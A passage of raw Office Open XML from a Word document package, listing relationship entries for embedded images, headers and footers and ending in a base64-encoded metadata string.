                  <pic:cNvPr id="0" name="image2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A8">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A9">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7"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Quarkus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6.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xm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footer" Target="footer1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.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31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.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7.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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1.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seJgQQyuVi6FVylPdLzy/65mVQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjVqcXBvZnkwcXZtdjIOaC52NzVpajlweHhrcngyDmguaHlwcTBwM3hkZXhyMg5oLnBkbjhjMWo3bG91aDIOaC5hcGZqeXY5eHRqcXEyDmgubHg2eW5yZWMzZGlkMg5oLjE3NWY1Y3M5NHowbzgAciExVHNtVko5MWVLQWpwaXZjWWR1aU16QUdYME8wRE52Z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